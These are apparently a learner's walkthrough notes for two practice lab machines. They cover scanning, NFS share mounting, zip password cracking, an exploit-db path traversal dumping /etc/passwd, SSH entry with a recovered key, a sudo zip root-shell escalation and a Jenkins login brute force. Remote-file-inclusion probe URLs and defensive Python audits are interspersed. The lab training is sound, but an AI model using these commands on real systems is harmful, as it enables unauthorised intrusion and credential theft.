+ /index.php?page=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page=http://blog.cirt.net/rfiinc.txt%00: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagehttp://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?page[path]=http://blog.cirt.net/rfiinc.txt?&cmd=ls: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagename=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pageNikto=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pager=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pagina=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?path_to_folder=http://blog.cirt.net/rfiinc.txt?cmd=id: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pg=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?pg=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?phpbb_root_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?plugin=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?principal=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?proMod=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?proMod=http://blog.cirt.net/rfiinc.txt?cmd: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?project=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?repinc=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?root_prefix=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?section=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?site=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?site_path=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?styl[top]=http://blog.cirt.net/rfiinc.txt??: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?template=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?templates_dir=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?theme=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?themepath=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?themesdir=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?this_path=http://blog.cirt.net/rfiinc.txt?: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?txt=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?up=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?url=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?w=http://blog.cirt.net/rfiinc.txt: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ /index.php?way=http://blog.cirt.net/rfiinc.txt??????????????: Remote File Inclusion (RFI) from RSnake's RFI list. See: https://gist.github.com/mubix/5d269c686584875015a2
+ 8102 requests: 0 error(s) and 142 item(s) reported on remote host
+ End Time: 2024-07-24 02:00:04 (GMT-4) (27 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
driver: sqlite
databasename: bolt
username: bolt
password: I_love_java
bolt.db, size is 0
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt:FUZZ -u http://192.168.92.132:8080/FUZZ
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://192.168.92.132:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
# [Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 77ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 90ms]
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 74ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 76ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 125ms]
# on atleast 2 different hosts [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 124ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 129ms]
# directory-list-2.3-medium.txt [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 121ms]
dev [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
# Copyright 2007 James Fisher [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 520ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 556ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 561ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 569ms]
[Status: 200, Size: 94539, Words: 4684, Lines: 1159, Duration: 565ms]
# [Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 565ms]
[Status: 200, Size: 94540, Words: 4684, Lines: 1159, Duration: 950ms]
server-status [Status: 403, Size: 281, Words: 20, Lines: 10, Duration: 3ms]
:: Progress: [220560/220560] :: Job [1/1] :: 952 req/sec :: Duration: [0:00:31] :: Errors: 0 ::
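Both ffuf runs above (port 80 and port 8080) show the same noise pattern: every wordlist line that starts with `#`, and the blank line, comes back with exactly the baseline status/size/words/lines of the site root. A leading `#` starts a URL fragment, which the client never transmits, so each of those requests is really `GET /`. The following is an added example, not output or code from the page or from ffuf: it parses ffuf's plain-text result lines, derives a baseline signature from those fragment hits (the same idea as ffuf's `-ac` auto-calibration, which uses random paths instead), and filters them out. The sample lines are a constructed subset of the first run.

```python
import re
from collections import Counter

# Constructed sample in ffuf's plain-text result format (a subset of the port 80
# run); it is not the tool's actual output file.
SAMPLE = """\
# Priority ordered case sensative list, where entries were found [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 23ms]
# Copyright 2007 James Fisher [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 27ms]
# [Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 4ms]
public [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
[Status: 200, Size: 3833, Words: 926, Lines: 108, Duration: 638ms]
src [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 1ms]
app [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 17ms]
vendor [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 2ms]
extensions [Status: 301, Size: 321, Words: 20, Lines: 10, Duration: 2ms]
server-status [Status: 403, Size: 279, Words: 20, Lines: 10, Duration: 4ms]
"""

LINE_RE = re.compile(
    r"^(?P<word>.*?)\s*\[Status: (?P<status>\d+), Size: (?P<size>\d+), "
    r"Words: (?P<words>\d+), Lines: (?P<lines>\d+), Duration: \d+ms\]$"
)


def parse_ffuf(text):
    """Turn ffuf result lines into dicts; banner and progress lines are skipped."""
    hits = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            hits.append({
                "word": m["word"],
                "status": int(m["status"]),
                "size": int(m["size"]),
                "words": int(m["words"]),
                "lines": int(m["lines"]),
            })
    return hits


def signature(hit):
    """The tuple ffuf's matchers/filters work on."""
    return (hit["status"], hit["size"], hit["words"], hit["lines"])


def fragment_noise(hits):
    """Wordlist entries that are comments or blank. A leading '#' begins a URL
    fragment, which the client never sends, so the request is really GET /."""
    return [h for h in hits if h["word"] == "" or h["word"].startswith("#")]


def baseline_signature(hits):
    """Most common signature among the fragment-noise hits: the same idea as
    ffuf -ac, which derives its baseline from requests for random paths."""
    noise = fragment_noise(hits)
    if not noise:
        return None
    return Counter(signature(h) for h in noise).most_common(1)[0][0]


def filter_hits(hits):
    """Drop every hit whose signature equals the baseline."""
    base = baseline_signature(hits)
    return [h for h in hits if signature(h) != base]


if __name__ == "__main__":
    for h in filter_hits(parse_ffuf(SAMPLE)):
        print(f"{h['word'] or '/'} -> {h['status']} ({h['size']} bytes)")
```

On the port 8080 run the baseline size alternates between 94539 and 94540 (the phpinfo page is not byte-stable), so an exact size filter such as `-fs 94540` would keep half the noise; filtering on the word or line count (`-fw 4684`, `-fl 1159`) or using `-ac` is more robust. Stripping comment lines from the wordlist beforehand (`grep -v '^#'`) avoids the fragment requests altogether.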
rpcinfo -p 192.168.92.132
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100005 1 udp 47818 mountd
100005 1 tcp 52185 mountd
100005 2 udp 55192 mountd
100005 2 tcp 59307 mountd
100005 3 udp 56740 mountd
100005 3 tcp 45403 mountd
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100227 3 tcp 2049 nfs_acl
100003 3 udp 2049 nfs
100227 3 udp 2049 nfs_acl
100021 1 udp 53462 nlockmgr
100021 3 udp 53462 nlockmgr
100021 4 udp 53462 nlockmgr
100021 1 tcp 43463 nlockmgr
100021 3 tcp 43463 nlockmgr
100021 4 tcp 43463 nlockmgr
showmount -e 192.168.92.132
Export list for 192.168.92.132:
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16
- Create a temp directory
mkdir /mnt/dev
- Mount it locally
mount -t nfs 192.168.92.132:/srv/nfs /mnt/dev
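The export above is readable from every RFC 1918 range (`172.16.0.0/12`, `10.0.0.0/8`, `192.168.0.0/16`), which is why the share can simply be mounted from the attacking VM. As an added example (not code from the page), here is a small audit of `showmount -e` output that flags client specs wider than a /24; the sample reproduces the export above plus two constructed entries, and the /24 threshold is an assumed policy.

```python
import ipaddress

# Constructed `showmount -e` output: the first export is the one listed above,
# the other two are made up to exercise the checks.
SAMPLE = """\
Export list for 192.168.92.132:
/srv/nfs 172.16.0.0/12,10.0.0.0/8,192.168.0.0/16
/srv/backup 192.168.92.0/24
/srv/public (everyone)
"""


def parse_showmount(text):
    """Map each exported path to its list of client specs."""
    exports = {}
    for line in text.splitlines()[1:]:        # first line is the header
        parts = line.split(None, 1)
        if not parts:
            continue
        path = parts[0]
        clients = parts[1].split(",") if len(parts) > 1 else ["*"]
        exports[path] = [c.strip() for c in clients if c.strip()]
    return exports


def admitted_hosts(client):
    """How many hosts a client spec admits; '*' / '(everyone)' means everyone."""
    if client in ("*", "(everyone)"):
        return float("inf")
    try:
        return ipaddress.ip_network(client, strict=False).num_addresses
    except ValueError:
        return 1          # hostname or netgroup: treated as one principal


def audit_exports(exports, max_hosts=256):
    """Flag client specs admitting more than max_hosts (a /24 by default;
    assumed policy, adjust to the environment)."""
    findings = []
    for path, clients in exports.items():
        for client in clients:
            hosts = admitted_hosts(client)
            if hosts > max_hosts:
                findings.append((path, client, hosts))
    return findings


if __name__ == "__main__":
    for path, client, hosts in audit_exports(parse_showmount(SAMPLE)):
        print(f"{path}: {client} admits {hosts} hosts")
```

`showmount` only shows the client list; whether the export uses `root_squash` or `no_root_squash` is visible only in `/etc/exports` on the server, so the check is a first pass, not a full review. The fix for this box's export is to narrow it to the one host or subnet that needs the share.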
- The share contains a password-protected file called save.zip; to crack it we need fcrackzip:
apt install fcrackzip
fcrackzip -v -u -D -p /usr/share/wordlists/rockyou.txt save.zip
- The password is java101. Make a temp directory and unzip the archive there:
mkdir /mnt/dev/temp
unzip /mnt/dev/save.zip -d /mnt/dev/temp
- Read the todo file:
cat /mnt/dev/temp/todo.txt
- Figure out how to install the main website properly, the config file seems correct...
- Update development website
- Keep coding in Java because it's awesome
jp
- The archive also holds an id_rsa file to connect to ssh. We try
ssh -i id_rsa jp@192.168.92.132
and the user bolt as well, but it doesn't work.
nmap --script ssh2-enum-algos -p 22 192.168.92.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-24 02:28 EDT
Nmap scan report for 192.168.92.132
Host is up (0.00075s latency).
PORT STATE SERVICE
22/tcp open ssh
| ssh2-enum-algos:
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group16-sha512
|       diffie-hellman-group18-sha512
|       diffie-hellman-group14-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       rsa-sha2-512
|       rsa-sha2-256
|       ssh-rsa
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
MAC Address: 00:0C:29:B6:36:DD (VMware)
Nmap done: 1 IP address (1 host up) scanned in 0.29 seconds
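The algorithm list above is OpenSSH's default set for this Debian release; it still offers SHA-1 key exchange (`diffie-hellman-group14-sha1`), SHA-1 MACs and `ssh-rsa` host-key signatures. As an added example (not from the page or from nmap), the code below parses an `ssh2-enum-algos` block and lists the algorithms a hardening baseline would drop. The sample is a constructed copy of the scan output, and the `WEAK` table is an abridged assumption, not an exhaustive policy.

```python
import re

# Constructed copy of the ssh2-enum-algos section above (OpenSSH's default
# algorithm set on this Debian release).
SAMPLE = """\
| ssh2-enum-algos:
|   kex_algorithms: (10)
|       curve25519-sha256
|       curve25519-sha256@libssh.org
|       ecdh-sha2-nistp256
|       ecdh-sha2-nistp384
|       ecdh-sha2-nistp521
|       diffie-hellman-group-exchange-sha256
|       diffie-hellman-group16-sha512
|       diffie-hellman-group18-sha512
|       diffie-hellman-group14-sha256
|       diffie-hellman-group14-sha1
|   server_host_key_algorithms: (5)
|       rsa-sha2-512
|       rsa-sha2-256
|       ssh-rsa
|       ecdsa-sha2-nistp256
|       ssh-ed25519
|   encryption_algorithms: (6)
|       chacha20-poly1305@openssh.com
|       aes128-ctr
|       aes192-ctr
|       aes256-ctr
|       aes128-gcm@openssh.com
|       aes256-gcm@openssh.com
|   mac_algorithms: (10)
|       umac-64-etm@openssh.com
|       umac-128-etm@openssh.com
|       hmac-sha2-256-etm@openssh.com
|       hmac-sha2-512-etm@openssh.com
|       hmac-sha1-etm@openssh.com
|       umac-64@openssh.com
|       umac-128@openssh.com
|       hmac-sha2-256
|       hmac-sha2-512
|       hmac-sha1
|   compression_algorithms: (2)
|       none
|_      zlib@openssh.com
"""

# Algorithms a hardening baseline would drop, with the reason. Abridged; an
# assumption for illustration, not an exhaustive policy.
WEAK = {
    "kex_algorithms": {
        "diffie-hellman-group1-sha1": "1024-bit group with SHA-1",
        "diffie-hellman-group14-sha1": "SHA-1 key exchange",
        "diffie-hellman-group-exchange-sha1": "SHA-1 key exchange",
    },
    "server_host_key_algorithms": {
        "ssh-rsa": "RSA signatures over SHA-1 (off by default since OpenSSH 8.8)",
        "ssh-dss": "DSA host keys",
    },
    "encryption_algorithms": {
        "3des-cbc": "Triple DES", "aes128-cbc": "CBC mode", "aes256-cbc": "CBC mode",
        "arcfour": "RC4", "arcfour128": "RC4", "arcfour256": "RC4",
    },
    "mac_algorithms": {
        "hmac-md5": "MD5 MAC", "hmac-sha1": "SHA-1 MAC",
        "hmac-sha1-etm@openssh.com": "SHA-1 MAC",
    },
}

SECTION_RE = re.compile(r"^(\w+): \((\d+)\)$")


def parse_enum_algos(text):
    """Return {section: [algorithm, ...]} from nmap's ssh2-enum-algos output."""
    sections, current = {}, None
    for line in text.splitlines():
        body = line.lstrip("|_ ").strip()     # drop nmap's "|" / "|_" gutter
        m = SECTION_RE.match(body)
        if m:
            current = m.group(1)
            sections[current] = []
        elif current and body:
            sections[current].append(body)
    return sections


def audit_algos(sections):
    """List (section, algorithm, reason) for every offered algorithm in WEAK."""
    return [(sec, alg, WEAK[sec][alg])
            for sec, algs in sections.items()
            for alg in algs if alg in WEAK.get(sec, {})]


if __name__ == "__main__":
    for sec, alg, why in audit_algos(parse_enum_algos(SAMPLE)):
        print(f"{sec}: {alg} ({why})")
```

On the server side the four findings go away with `KexAlgorithms -diffie-hellman-group14-sha1`, `MACs -hmac-sha1,hmac-sha1-etm@openssh.com` and `HostKeyAlgorithms -ssh-rsa` in sshd_config (the `-` prefix removes entries from the default list on current OpenSSH), followed by a restart of sshd and a rescan to confirm.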
- Register on http://192.168.92.132:8080/dev/index.php
- Go to https://www.exploit-db.com/exploits/48411 and copy the path traversal payload:
index.php?p=action.search&action=../../../../../../../etc/passwd
- The full URL becomes:
http://192.168.92.132:8080/dev/index.php?p=action.search&action=../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
jeanpaul:x:1000:1000:jeanpaul,,,:/home/jeanpaul:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false
_rpc:x:107:65534::/run/rpcbind:/usr/sbin/nologin
statd:x:108:65534::/var/lib/nfs:/usr/sbin/nologin
- Try /etc/shadow too, you never know.
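The `action` parameter above is joined onto a directory and included with no validation, so seven `../` segments walk out to `/etc/passwd`. Below is an added example, not the dev site's own code: a Python rendering of that vulnerable pattern beside a hardened resolver (allow-listed name plus a containment check on the canonical path), and a detector for the same payload in access logs that survives single and double URL encoding. The `/var/www/dev/actions` layout, the `search` action name and the log lines are all constructed assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Hypothetical layout for the dev site: action handlers live in one directory
# and ?p=action.search&action=<name> selects one. Names are assumptions; this
# is not the application's own code.
ACTIONS_DIR = "/var/www/dev/actions"
SAFE_NAME = re.compile(r"[A-Za-z0-9_]{1,32}")


def vulnerable_action_path(action):
    """The pattern behind the finding above: the parameter is joined onto the
    directory with no validation, so '../' segments walk out of it."""
    return posixpath.normpath(posixpath.join(ACTIONS_DIR, action))


def resolve_action_path(action):
    """Hardened: allow-list the name, then prove the canonical path is still
    under ACTIONS_DIR before it is used for any include."""
    if not SAFE_NAME.fullmatch(action):
        raise ValueError(f"rejected action name: {action!r}")
    path = posixpath.normpath(posixpath.join(ACTIONS_DIR, action))
    if posixpath.commonpath([ACTIONS_DIR, path]) != ACTIONS_DIR:
        raise ValueError("path escapes the actions directory")
    return path


def has_traversal(value, decode_rounds=2):
    """Detection for access logs or WAF rules: decode repeatedly (to catch
    double encoding), normalise backslashes, then look for a '..' segment."""
    for _ in range(decode_rounds):
        value = unquote(value)
    value = value.replace("\\", "/")
    return re.search(r"(^|[^\w.])\.\.(/|$)", value) is not None


# Constructed Apache combined-format access-log lines (not from the box).
LOG_LINES = [
    '192.168.92.1 - - [24/Jul/2024:02:40:11 -0400] "GET /dev/index.php?p=action.search&action=../../../../../../../etc/passwd HTTP/1.1" 200 2165',
    '192.168.92.1 - - [24/Jul/2024:02:41:02 -0400] "GET /dev/index.php?p=action.search&action=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 200 1203',
    '192.168.92.1 - - [24/Jul/2024:02:42:30 -0400] "GET /dev/index.php?p=action.search&action=search HTTP/1.1" 200 3412',
]


def suspicious_requests(lines):
    """Return the request targets of log lines whose target contains traversal."""
    out = []
    for line in lines:
        m = re.search(r'"(?:GET|POST) (\S+) HTTP/', line)
        if m and has_traversal(m.group(1)):
            out.append(m.group(1))
    return out


if __name__ == "__main__":
    payload = "../../../../../../../etc/passwd"
    print("vulnerable:", vulnerable_action_path(payload))
    print("hardened  :", resolve_action_path("search"))
    print("flagged   :", suspicious_requests(LOG_LINES))
```

The allow-list alone stops the payload; the `commonpath` check is defence in depth for the day someone relaxes the pattern. On the PHP side the equivalent is mapping the parameter through a fixed array of permitted handlers instead of building an include path from it.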
ssh -i /mnt/dev/temp/id_rsa jeanpaul@192.168.92.132
Enter passphrase for key '/mnt/dev/temp/id_rsa': I_love_java
Linux dev 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jun 2 05:25:21 2021 from 192.168.10.31
jeanpaul@dev:~$ whoami
jeanpaul
jeanpaul@dev:~$ sudo -l
Matching Defaults entries for jeanpaul on dev:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jeanpaul may run the following commands on dev:
(root) NOPASSWD: /usr/bin/zip
- John the Ripper can also brute-force the passphrase.
- Check for variants of the password in the wordlist:
cat /usr/share/wordlists/rockyou.txt | grep I_love_java
Nothing shows up.
- Other commands to run once logged in: pwd, history and sudo -l (lists the user's sudo privileges without needing the password).
- Use this technique:
https://www.hackingarticles.in/linux-for-pentester-zip-privilege-escalation/
or search on GTFOBins: https://gtfobins.github.io/gtfobins/zip/#sudo
jeanpaul@dev:~$ touch raj.txt
jeanpaul@dev:~$ ls
raj.txt
jeanpaul@dev:~$ sudo zip 1.zip raj.txt -T --unzip-command="sh -c /bin/bash"
adding: raj.txt (stored 0%)
root@dev:/home/jeanpaul# whoami
root
root@dev:/home/jeanpaul# cd ../..
root@dev:/# ls
bin boot dev etc home initrd.img initrd.img.old lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin srv sys tmp usr var vmlinuz vmlinuz.old
root@dev:/# cd root/
root@dev:~# ls
flag.txt
root@dev:~# cat flag.txt
Congratz on rooting this box !
nmap -T4 -p- -A 192.168.92.133
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-25 01:06 EDT
Nmap scan report for 192.168.92.133
Host is up (0.0011s latency).
Not shown: 65523 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
5040/tcp open unknown
7680/tcp open pando-pub?
8080/tcp open http Jetty 9.4.41.v20210516
| http-robots.txt: 1 disallowed entry
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.41.v20210516)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
MAC Address: 00:0C:29:7E:5B:8E (VMware)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: 8h59m58s
|_nbstat: NetBIOS name: BUTLER, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:7e:5b:8e (VMware)
| smb2-time:
| date: 2024-07-25T14:09:55
|_ start_date: N/A
TRACEROUTE
HOP RTT ADDRESS
1 1.14 ms 192.168.92.133
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 209.25 seconds
Notes
8080 Jetty 9.4.41.v20210516, jenkins login page, 403 on all subdirectories
5040
7680
135/tcp (msrpc)
139/tcp (netbios-ssn) & 445/tcp (microsoft-ds)
49664/tcp to 49670/tcp (msrpc)
apt install telnet
telnet 192.168.92.133 7680
Trying 192.168.92.133...
Connected to 192.168.92.133.
Escape character is '^]'.
- We use Burp Suite Intruder with the cluster bomb attack type, because we know neither the username nor the password.
- Payload set 1 is the usernames, payload set 2 the passwords.
- Launch the attack.
- Analyze the length of the responses: the right combination is jenkins:jenkins, because that response sets the cookie JSESSIONID.3212a3e3=node0gxugk8f2xj3u1bdtqam5rxs440.node0.
POST /j_spring_security_check HTTP/1.1
Host: 192.168.92.133:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://192.168.92.133:8080
Connection: keep-alive
Referer: http://192.168.92.133:8080/loginError
Cookie: JSESSIONID.3212a3e3=node0gxugk8f2xj3u1bdtqam5rxs440.node0
Upgrade-Insecure-Requests: 1
